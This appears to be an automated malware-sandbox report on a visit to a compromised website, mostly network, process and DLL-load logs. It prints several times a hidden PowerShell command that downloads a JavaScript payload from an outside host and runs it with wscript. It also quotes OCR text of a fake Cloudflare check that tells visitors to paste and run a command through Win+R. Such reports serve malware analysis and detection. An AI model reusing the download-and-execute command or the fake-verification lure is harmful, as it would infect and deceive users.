                    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                    Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49773 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49789 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.189.173.27:443 -> 192.168.2.16:49790 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49791 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 13.107.6.254:443 -> 192.168.2.16:49792 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 13.107.136.254:443 -> 192.168.2.16:49793 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49794 version: TLS 1.2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFF7B2812ED15_2_00007FFF7B2812ED
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFF7B4C0F6515_2_00007FFF7B4C0F65
                    Source: classification engineClassification label: mal100.phis.evad.win@35/168@104/43
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF5cedbb.TMPJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6132:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_762381681
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yd1u4dcy.fkb.ps1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1864,i,9471181850235486042,10300577009420113889,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2212 /prefetch:3
                    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.elevate.inc/our-story"
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l=\'https://coreun.com/wp-content/d5\';$p=Join-Path $env:TEMP \'x.js\';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList \'//nologo\',$p -WindowStyle Hidden}catch{}"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -w hidden -c "=\'https://coreun.com/wp-content/d5\';=Join-Path C:\Users\user\AppData\Local\Temp \'x.js\';try{(New-Object Net.WebClient).DownloadFile(,);Start-Process wscript -ArgumentList \'//nologo\', -WindowStyle Hidden}catch{}"
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1864,i,9471181850235486042,10300577009420113889,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2212 /prefetch:3Jump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -w hidden -c "=\'https://coreun.com/wp-content/d5\';=Join-Path C:\Users\user\AppData\Local\Temp \'x.js\';try{(New-Object Net.WebClient).DownloadFile(,);Start-Process wscript -ArgumentList \'//nologo\', -WindowStyle Hidden}catch{}"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 0000000F.00000002.1611645953.0000015DA162C000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.pdbF source: powershell.exe, 0000000F.00000002.1611823408.0000015DA16F5000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: ystem.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000F.00000002.1611645953.0000015DA16B2000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb=>sw source: powershell.exe, 0000000F.00000002.1611645953.0000015DA162C000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: 61934e089\System.Core.pdb source: powershell.exe, 0000000F.00000002.1611645953.0000015DA16B2000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 0000000F.00000002.1611645953.0000015DA16C7000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Core.pdb source: powershell.exe, 0000000F.00000002.1611645953.0000015DA1685000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 0000000F.00000002.1611645953.0000015DA162C000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000F.00000002.1611645953.0000015DA1685000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.pdb source: powershell.exe, 0000000F.00000002.1611823408.0000015DA16F5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1611588031.0000015DA15A2000.00000004.00000020.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Suspicious powershell command line found
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l=\'https://coreun.com/wp-content/d5\';$p=Join-Path $env:TEMP \'x.js\';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList \'//nologo\',$p -WindowStyle Hidden}catch{}"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -w hidden -c "=\'https://coreun.com/wp-content/d5\';=Join-Path C:\Users\user\AppData\Local\Temp \'x.js\';try{(New-Object Net.WebClient).DownloadFile(,);Start-Process wscript -ArgumentList \'//nologo\', -WindowStyle Hidden}catch{}"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -w hidden -c "=\'https://coreun.com/wp-content/d5\';=Join-Path C:\Users\user\AppData\Local\Temp \'x.js\';try{(New-Object Net.WebClient).DownloadFile(,);Start-Process wscript -ArgumentList \'//nologo\', -WindowStyle Hidden}catch{}"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFF7B4C4F17 push ebx; ret 15_2_00007FFF7B4C4F1A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFF7B7A79DA push ecx; retf 15_2_00007FFF7B7A79DC
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFF7B7A7C1A push es; ret 15_2_00007FFF7B7A7C27
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFF7B7A0768 push eax; ret 15_2_00007FFF7B7A0769
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFF7B7A830E pushfd ; retf 15_2_00007FFF7B7A8311
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFF7B7A4B0D push esp; iretd 15_2_00007FFF7B7A4B0E
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFF7B1D3C7A push 8B49FFE7h; iretd 22_2_00007FFF7B1D3C7F
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFF7B400177 push ebx; ret 22_2_00007FFF7B400178
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFF7B566A59 push esp; iretd 22_2_00007FFF7B566A5A

                    Persistence and Installation Behavior

                    barindex
                    Detect drive by download via clipboard copy & paste
                    Source: Chrome DOM: 0.16OCR Text: e elevate.inc Verify you are human by completing the action below. Verification Steps CarF1der<iaIirz Terms ar. To better prove you are not a robot, please: 1. Press & hold the Windows Key + R. 2. In the verification window, press Ctrl + V. 3. Press Enter on your keyboard to finish. You will observe and agree Cloudflare verification (Ray ID: c7d266e1222bf2e) Perform the steps above to finish Verify verificatiom Ray c7d266e1222bf2e Platform performance and security Cloudflare
